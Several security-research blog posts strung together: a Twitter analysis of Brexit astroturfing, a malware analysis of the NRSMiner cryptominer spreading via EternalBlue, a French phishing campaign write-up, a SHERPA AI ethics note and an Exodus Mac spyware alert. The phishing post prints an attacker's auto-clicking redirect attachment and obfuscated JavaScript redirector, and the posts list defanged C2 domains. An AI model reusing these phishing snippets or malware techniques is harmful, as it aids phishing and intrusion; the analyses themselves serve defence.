  • 278 (0.70%) accounts retweeted over 2000 times across the entire dataset, for a total of 880,620 retweets (20.5%). Of these, temporal analysis suggests that 33 of the accounts exhibited potentially suspicious behavior (11.9%) and 14 accounts tweeted during non-UK time schedules.
  • At the time of writing, 133 of these accounts (0.33%) had been suspended by Twitter.

Remain community

The remain-centric community comprised of 52,205 users. They published 1.7 million unique tweets, and a total of 6.2 million retweets across the dataset.

  • 3413 (6.54%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 436 (0.84%) accounts retweeted over 2000 times across the entire dataset, for a total of 1,471,515 retweets (23.7%). Of these, temporal analysis suggests that 41 of the accounts exhibited potentially suspicious behavior (9.4%) and 18 accounts tweeted during non-UK time schedules.
  • At the time of writing, 54 of these accounts (0.10%) had been suspended by Twitter.


Although we were initially suspicious of high-volume retweeters, the presence of these in roughly equal proportions in both groups led us to believe that this sort of behaviour might be somewhat standard on Twitter. The top remain-centric group’s high-volume retweeters published more often than top leave-centric high-volume retweeters. I observed that many of the top retweeters from the remain-centric group tended to tweet a lot about Labour.

The top retweeted account in the leave-centric group received substantially more retweets than the next most highly retweeted account. This was not the case for the remain-centric group.

  • Top hashtags used by the remain-centric group included: #peoplesvote, #stopbrexit, #eu, #fbpe, #remain, #labour, #finalsay, and #revokea50. All of the top-50 hashtags in this group were themed around anti-brexit sentiment, around politicians, or around political events that happened in the UK during the data collection period (#specialplaceinhell, #theresamay, #corbyn, #donaldtusk, #newsnight).
  • Top hashtags used by the leave-centric group included: #eu, #nodeal, #standup4brexit, #ukip, #leavemeansleave, #projectfear and #leave. Notable other hashtags on the top-50 list for this group were other “no-deal” hashtags (#gowto, #wto, #letsgowto, #nodealnoproblem, #wtobrexit), hashtags referring to protests in France and the adoption of high-vis vest by far-right UK protesters (#giletsjaunes, #yellowvestsuk, #yellowvestuk) and the hashtag #trump.
  • Both groups heavily advertised links to UK Parliament online petitions relevant to the outcome of brexit. The remain group advertised links to petitions requesting a second referendum, whilst the leave group advertised links to petitions demanding the UK leave the EU, regardless of the outcome of negotiations.
  • From the users we identified as having retweeted more than 95% of the time, we found 62 accounts from the leave-centric group that were clearly American right-wing personas. These accounts associated with #Trump and #MAGA, amplified US political content, and interacted with US-based alt-right personalities (in addition to amplifying Brexit-related content). The description fields of these accounts usually included words such as “Patriot”, “Christian”, “NRA”, and “Israel”. Many of these accounts had their locations set to a state or city in the US. The most common locations set for these accounts were: Texas, Florida, California, New York, and North Carolina. We found no evidence of equivalent accounts in the remain-centric group.
  • Following on from our previous discovery, using a simple string search, we found 1294 accounts in the leave-centric group and 12 accounts in the remain-centric group that had #MAGA in either their name or description fields. We manually visited a random selection of these accounts to verify that they were alt-right personas. A few of the #MAGA accounts identified in the remain group were not what we would consider alt-right – they showed up in the results due to the presence of negative comments about MAGA culture in their account description fields.
  • As detailed earlier, some of the accounts in the leave-centric group interacted with non-authoritative, far-right “news” accounts, or shared links with sites associated with these accounts (such as UnityNewsNet, BreakingNLive, LibertyDefenders, INewsNet, Voice of Europe, ZNEWSNET, PoliticalUK, and PoliticaLite.) We didn’t find an analogous activity in the remain-centric group.

We created a few plots of the number of times a hashtag was observed during each hour of the day. For a baseline reference, here’s what that plot looks like for the #brexit hashtag:

You can clearly see a lull in activity during night-time hours in the UK. Compare the above baseline with the plot for the #yellowvestuk hashtag:

This clearly shows that the #yellowvest hashtag is most frequently used in the late evening UK time (mid-afternoon US time). Here is the plot for #yellowvestsuk:

Note that this hashtag follows a different pattern to #yellowvestuk, and is used most often around lunchtime in the UK. Both of these graphs show a lull in activity during night-time hours in the UK, indicating that the accounts pushing these hashtags most likely belong to people living in the UK, and that possibly different groups are promoting these two competing hashtags.

Final thoughts

It is very difficult to determine whether a Twitter account is a bot, or acting as part of a coordinated astroturfing campaign, simply by performing queries with the standard API. Twitter’s programmatic interface imposes many limitations to what can be done when analyzing an account. For instance, by default, only the last 3200 tweets can be collected from any given account, and Twitter restricts how often such a query can be run. Most of the potentially suspicious accounts identified during this research have published tens, or even hundreds of thousands of tweets over their lifetimes, most of which are now inaccessible.

Since Twitter’s API doesn’t support observing when a user “likes” a tweet, and has limited support for querying which accounts retweeted a tweet, or replied to a tweet, it is impossible to track all actions that occur on the platform. Nowadays, a user’s Twitter timeline contains a series of recommendations (for instance, tweets that appear on user’s timeline may indicate that they are there because “user x that you follow liked this tweet”). The timeline is no longer just a sequential list of tweets published by accounts a user follows. Hence it is important to understand which actions might increase the likelihood that a tweet appears on a user’s timeline, is recommended to a user (via notifications) or appears in a curated list when performing a search.

We do know that Twitter’s systems track an internal representation of the quality of every account, and give more engagement weight to higher quality accounts. Although it is likely that many of the potentially suspicious accounts identified during our research have low quality scores, it is still possible that their collective actions may incorrectly modify the sentiment of certain viewpoints and opinions, or cause content to be shown to users when it otherwise shouldn’t have.

From analysis of the “leave” and “remain” communities obtained by graph analysis, it seems clear to us that the remain-centric group looks quite organic, whilst the leave-centric group are being bolstered by non-UK far-right Twitter accounts. Leave users also utilize a number of “non-authoritative” news sources to spread their messages. Given that we also observed a subset of leave accounts performing amplification of political content related to French and US politics, we wouldn’t be surprised if coordinated astroturfing activity is being used to amplify pro-Brexit sentiment. Finding such a phenomenon would require additional work – most of the tweets published by this group likely weren’t captured by our stream-search for the word “brexit”. It’s clear that an internationally-coordinated collective of far-right activists are promoting content on Twitter (and likely other social networks) in order to steer discussions and amplify sentiment and opinion towards their own goals, Brexit being one of them.

During the course of our research, we created over 90 separate Jupyter notebooks and custom analysis tools. We would approximate that 90% of the approaches we tried ended up in dead ends. Despite all of this analysis work, we didn’t find the “next big” political disinformation botnet. We did, however, find many phenomena that were both interesting and odd.

Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks, (like mapping the time of day that @realDonaldTrump tweets) and then moved onto creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture, that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in-turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

Its not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.

NRSMiner updates to newer version

More than a year after the world first saw the Eternal Blue exploit in action during the May 2017 WannaCry outbreak, we are still seeing unpatched machines in Asia being infected by malware that uses the exploit to spread. Starting in mid-November 2018, our telemetry reports indicate that the newest version of the NRSMiner cryptominer, which uses the Eternal Blue exploit to propagate to vulnerable systems within a local network, is actively spreading in Asia. Most of the infected systems seen are in Vietnam.


November-December 2018 telemetry statistics for NRSMiner, by country

In addition to downloading a cryptocurrency miner onto an infected machine, NRSMiner can download updated modules and delete the files and services installed by its own previous versions.

This post provides an analysis of how the latest version of NRSMiner infects a system and finds new vulnerable targets to infect. Recommendations for mitigation measures, IOCs and SHA1s are listed at the end of the post.


How NRSMiner spreads

There are 2 methods by which a system can be infected by the newest version of NRSMiner:

  • By downloading the updater module onto a system that is already infected with a previous version of NRSMiner, or:
  • If the system is unpatched (MS17-010) and another system within the intranet has been infected by NRSMiner.


Method 1: Infection via the Updater module

First, a system that has been infected with an older version of NRSMiner (and has the wmassrv service running) will connect to tecate[.]traduires[.]com to download an updater module to the %systemroot%\temp folder as tmp[xx].exe, where [xx] is the return value of the GetTickCount() API.

When this updater module is executed, it downloads another file to the same folder from one of a series of hard-coded IP addresses:


List of IP addresses found in different updater module files

The downloaded file, /x86 or /x64, is saved in the %systemroot%\temp folder as WUDHostUpgrade[xx].exe; again, [xx] is the return value of the GetTickCount() API.


The WUDHostUpgrade[xx].exe first checks the mutex {502CBAF5-55E5-F190-16321A4} to determine if the system has already been infected with the latest NRSMiner version. If the system is infected, the WUDHostUpgrade[xx].exe deletes itself. ­Otherwise, it will delete the files MarsTraceDiagnostics.xml, snmpstorsrv.dll, MgmtFilterShim.ini.

Next, the module extracts the following files from its resource section (BIN directory) to the %systemroot%\system32 or %systemroot%\sysWOW64 folder: MarsTraceDiagnostics.xml, snmpstorsrv.dll.

It then copies the values for the CreationTime, LastAccessTime and LastWritetime properties from svchost.exe and updates the same properties for the MarsTraceDiagnostics.xml and snmpstorsrv.dll files with the copied values.

Finally, the WUDHostUpgrade[xx].exe installs a service named snmpstorsrv, with snmpstorsrv.dll registered as servicedll. It then deletes itself.



Pseudo-code for WUDHostUpgradexx.exe’s actions


Snmpstorsrv service

The newly-created Snmpstorsrv service starts under “svchost.exe -k netsvcs” and loads the snmpstorsrv.dll file, which creates multiple threads to perform several malicious activities.


Snmpstorsrv service’s activities

The service first creates a file named MgmtFilterShim.ini in the %systemroot%\system32 folder, writes ‘+’ in it and modifies its CreationTime, LastAccessTime and LastWritetime properties to have the same values as svchost.exe.

Next, the Snmpstorsrv service extracts malicious URLs and the cryptocurrency miner’s configuration file from MarsTraceDiagnostics.xml.


Malicious URLs and miner configuration details in the MarsTraceDiagnostics.xml file

On a system that is already infected with an older version of NRSMiner, the malware will delete all components of its older version before infecting it with the newer one. To remove the prior version of itself, the newest version refers to a list of services, tasks and files to be deleted that can be found as strings in the snmpstorsrv.dll file;  to remove all older versions, it refers to a list that is found in the MarsTraceDiagnostics.xml file.


List of services, tasks, files and folders to be deleted

After all the artifacts of the old versions are deleted, the Snmpstorsrv service checks for any updates to the miner module by connecting to:

  • reader[.]pamphler[.]com/resource
  • handle[.]pamphler[.]com/modules.dat

If an updated miner module is available, it is downloaded and written into the MarsTraceDiagnostics.xml file. Once the new module is downloaded, the old miner file in %systemroot%\system32\TrustedHostex.exe is deleted. The new miner is decompressed in memory and the newly extracted miner configuration data is written into it.

This newly updated miner file is then injected into the svchost.exe to start crypto-mining. If the injection fails, the service instead writes the miner to %systemroot%\system32\TrustedHostex.exe and executes it.


The miner decompressed in memory

Next, the Snmpstorsrv service decompresses the wininit.exe file and injects it into svchost.exe. If the injection fails, it writes wininit.exe to %systemroot%\AppDiagnostics\wininit.exe and executes it. The service also opens port 60153 and starts listening.

In two other threads, the service sends out details about the infected system to the following sites:

  • pluck[.]moisture[.]tk – MAC address, IP Address, System Name, Operating System information
  • jump[.]taucepan[.]com – processor and memory specific information

This slideshow requires JavaScript.

System information forwarded to remote sites

Based on the information sent, a new updater file will be downloaded and executed, which will perform the same activities as described in “Updater Module” section above. This updater module can be used to infect systems with any new upcoming version of NRSMiner.


Method 2: Infection via Wininit.exe and Exploit

In the latest NRSMiner version, wininit.exe is responsible for handling its exploitation and propagation activities. Wininit.exe decompresses the zipped data in %systemroot%\AppDiagnostics\blue.xml and unzips files to the AppDiagnostics folder. Among the unzipped files is one named svchost.exe, which is the Eternalblue – 2.2.0 exploit executable. It then deletes the blue.xml file and writes 2 new files named x86.dll and x64.dll in the AppDiagnostics folder.

Wininit.exe scans the local network on TCP port 445 to search for other accessible systems. After the scan, it executes the Eternalblue executable file to exploit any vulnerable systems found. Exploit information is logged in the process1.txt file.

If the vulnerable system is successfully exploited, Wininit.exe then executes spoolsv.exe, which is the DoublePulsar – 1.3.1 executable file. This file installs the DoublePulsar backdoor onto the exploited system. Depending on the operating system of the target, either the x86.dll or x64.dll file is then transferred by Wininit.exe and gets injected into the targeted system’s lsass.exe by the spoolsv.exe backdoor.


Propagation method


This file creates a socket connection and gets the MarsTraceDiagnostics.xml file in %systemroot%\system32 folder from the parent infected system. It extracts the snmpstorsrv.dll, then creates and starts the Snmpstorsrv service on the newly infected system, so that it repeats the whole infection cycle and finds other vulnerable machines.

Miner module

NRSMiner uses the XMRig Monero CPU miner to generate units of the Monero cryptocurrency. It runs with one of the following parameters:


Miner parameters

The following are the switches used in the parameters:

  • -o, –url=URL                  URL of mining server
  • -u, –user=USERNAME username for mining server
  • -p, –pass=PASSWORD  password for mining server
  • -t, –threads=N               number of miner threads
  • –donate-level=N           donate level, default 5% (5 minutes in 100 minutes)
  • –nicehash                      enable nicehash.com support



F-Secure products currently detect and block all variants of this malware, with a variety of detections.

Mitigation recommendations

The following measures can be taken to mitigate the exploitation of the vulnerability targeted by Eternal Blue and prevent an infection from spreading in your environment.

  • For F-Secure products:
    • Ensure that the F-Secure security program is using the latest available database updates.
    • Ensure DeepGuard is turned on in all your corporate endpoints, and F-Secure Security Cloud connection is enabled.
    • Ensure that F-Secure firewall is turned on in its default settings. Alternatively, configure your firewall to properly block 445 in- and outbound traffic within the organization to prevent it from spreading within the local network.
  • For Windows:
    • Use Software Updater or any other available tool to identify endpoints without the Microsoft-issued security fix (4013389) and patch them immediately.
    • Apply the relevant security patches for any Windows systems under your administration based on the guidance given in Microsoft’s Customer Guidance for WannaCrypt attacks.
    • If you are unable to patch it immediately, we recommend that you disable SMBv1 with the steps documented in Microsoft Knowledge Base Article 2696547 to reduce attack surface.


Indicator of compromise – IOC:


32ffc268b7db4e43d661c8b8e14005b3d9abd306 - MarsTraceDiagnostics.xml
07fab65174a54df87c4bc6090594d17be6609a5e - snmpstorsrv.dll
abd64831ad85345962d1e0525de75a12c91c9e55 - AppDiagnostics folder (zip)
4971e6eb72c3738e19c6491a473b6c420dde2b57 - Wininit.exe
e43c51aea1fefb3a05e63ba6e452ef0249e71dd9 – tmpxx.exe
327d908430f27515df96c3dcd180bda14ff47fda – tmpxx.exe
37e51ac73b2205785c24045bc46b69f776586421 - WUDHostUpgradexx.exe
da673eda0757650fdd6ab35dbf9789ba8128f460 - WUDHostUpgradexx.exe
ace69a35fea67d32348fc07e491080fa635cc859 - WUDHostUpgradexx.exe
890377356f1d41d2816372e094b4e4687659a96f - WUDHostUpgradexx.exe
7f1f63feaf79c5f0a4caa5bbc1b9d76b8641181a - WUDHostUpgradexx.exe
9d4d574a01aaab5688b3b9eb4f3df2bd98e9790c - WUDHostUpgradexx.exe
9d7d20e834b2651036fb44774c5f645363d4e051 – x64.dll
641603020238a059739ab4cd50199b76b70304e1 – x86.dll

IP addresses:




Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting the French industry. Among these targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning October 2018, we have seen multiple phishing emails which follow a similar pattern, similar indicators, and obfuscation with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the prefix of the attachment name. The attachments could be an HTML or a PDF file usually named as “document“, “preuves“, or “fact” which can be followed by underscore and 6 numbers. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf

Here’s an example content of an XHTML attachment from 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<meta content="UTF-8" />
<body onload='document.getElementById("_y").click();'>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>


Evolution of the campaign

The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October these payload addresses were further obfuscated by putting them behind redirects. The author has developed a simple Javascript to obfuscate a bunch of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This Javascript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected the users to the payload domain. In this particular campaign, the payload domain has changed to hxxp://email-document-joint[.]pro/redir/.

However, it appears that the use of Javascript code inside attachments was not a huge success as only some days later, the Javascript code for domain deobfuscation and redirection has been moved behind pste.eu, a Pastebin-like service for HTML code. So then the phishing emails thereafter contained links to pste.eu such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution during November, we observed few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site.

At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.

Few days later at 15th of November, the attackers continued to add redirections in between the pste.eu URLs by using Twitter shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents into their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns or products/lotteries etc.


The pste.eu links in Twitter


Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to 302 redirection chain. The delivery method remained as XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, it seems the payload URLs lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.



The campaign has been observed using mostly compromised Wanadoo email accounts and later email accounts in their own domains such as: rault@3130392E3130322E37322E3734.lho33cefy1g.pw to send out the emails. The subdomain name is the name of the sending email server and is a hex representation of the public IP address of the server, in this case:

The server behind the .pw domain appears to be a postfix email server listed already on multiple blacklists. For compromised email accounts used for sending out the phishing emails, they are always coming from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.

Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.


Additional Find

During the investigation we came across an interesting artifact in Virustotal submitted from France. The file is a .zip archive that contained the following

  • All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool containing the checker results. Both .vbs are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.


Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails in 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to ZIP up this tool along with the results to Virustotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with Wscript.Echo() alert


Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.



This is a non-exhaustive list of indicators observed during the campaign.

jeu0rgf5apd5337.site - Email Server - Email Server - Email Server - Web Server / Malware C2 Web Server / Malware C2 - Web Server - Web Server - Web Server - Web Server - Web Server

The following indicators have been observed but are benign and can cause false positives.


Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!


As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.



Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉

Spam campaign targets Exodus Mac Users

We’ve seen a small spam campaign that attempts to target Mac users that use Exodus, a multi-cryptocurrency wallet.

The theme of the email focuses mainly on Exodus. The attachment was “Exodus-MacOS-1.64.1-update.zip” and the sender domain was “update-exodus[.]io”, suggesting that it wanted to associate itself to the organization. It was trying to deliver a fake Exodus update by using the subject “Update 1.64.1 Release – New Assets and more”. Whereas, the latest released version for Exodus is 1.63.1.

Fake Exodus Update email

Extracting the attached archive leads to the application which was apparently created yesterday.

Spytool’s creation date

The application contains a mach-O binary with the filename “rtcfg”. The legitimate Exodus application, however, uses “Exodus”.

We checked out the strings and found a bunch of references to “realtime-spy-mac[.]com” website.

From the website, the developer described their software as a cloud-based surveillance and remote spy tool. Their standard offering costs $79.95 and comes with a cloud-based account where users can view the images and data that the tool uploaded from the target machine. The strings that was extracted from the Mac binary from the mail spam coincides with the features mentioned in the realtime-spy-mac[.]com tool.

Strings inside the Realtime-Spy tool

Searching for similar instances of the Mac keylogger in our repository yielded to other samples using these filenames:

  • taxviewer.app
  • picupdater.app
  • macbook.app
  • launchpad.app

Based on the spy tool’s website, it appears that it does not only support Mac, but Windows as well. It’s not the first time that we’ve seen Windows threats target Mac. As the crimeware threat actors in Windows take advantage of the cryptocurrency trend, they too seem to want to expand their reach, thus also ended up targeting Mac users.

Indicators of Compromise


  • b6f5a15d189f4f30d502f6e2a08ab61ad1377f6a – rtcfg
